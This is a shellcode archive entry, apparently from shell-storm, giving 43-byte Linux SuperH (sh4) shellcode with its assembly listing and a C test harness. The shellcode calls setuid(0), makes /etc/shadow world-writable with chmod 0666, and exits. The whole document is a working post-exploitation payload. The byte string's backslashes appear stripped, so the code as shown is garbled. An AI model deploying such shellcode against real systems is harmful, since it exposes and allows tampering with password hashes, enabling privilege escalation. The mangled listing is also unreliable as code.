[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Linux/SuperH - sh4 - setuid(0) - chmod("/etc/shadow", 0666) - exit(0) - 43 bytes
# Published : 2011-06-22
# Author :
# Previous Title : Linux/MIPS - execve /bin/sh - 48 bytes
# Next Title : Linux/SuperH - sh4 - setuid(0) ; execve("/bin/sh", NULL, NULL) - 27 bytes
/*
** Title: Linux/SuperH - sh4 - setuid(0) - chmod("/etc/shadow", 0666) - exit(0) - 43 bytes
** Date: 2011-06-22
** Tested on: Debian-sh4 2.6.32-5-sh7751r
** Author: Jonathan Salwan - twitter: @jonathansalwan
**
** http://shell-storm.org
**
**
** seteuid:
** mov #23, r3
** xor r4, r4
** trapa #2
** chmod:
** mov #15, r3
** mova @(24, pc), r0
** mov r0, r4
** mov #87, r8
** mov #5, r9
** mul.l r8, r9
** sts macl, r5
** add #3, r5
** trapa #2
** exit:
** xor r3, r3
** mov #1, r3
** xor r4, r4
** trapa #2
** file:
** .string "/etc/shadow"
**
*/
#include <stdio.h>
#include <string.h>
char *SC = "x17xe3x4ax24x02xc3x0fxe3x05xc7x03"
"x64x57xe8x05xe9x87x09x1ax05x03x75"
"x02xc3x3ax23x01xe3x4ax24x02xc3x2f"
"x65x74x63x2fx73x68x61x64x6fx77";
int main(void)
{
fprintf(stdout,"Length: %dn",strlen(SC));
(*(void(*)()) SC)();
}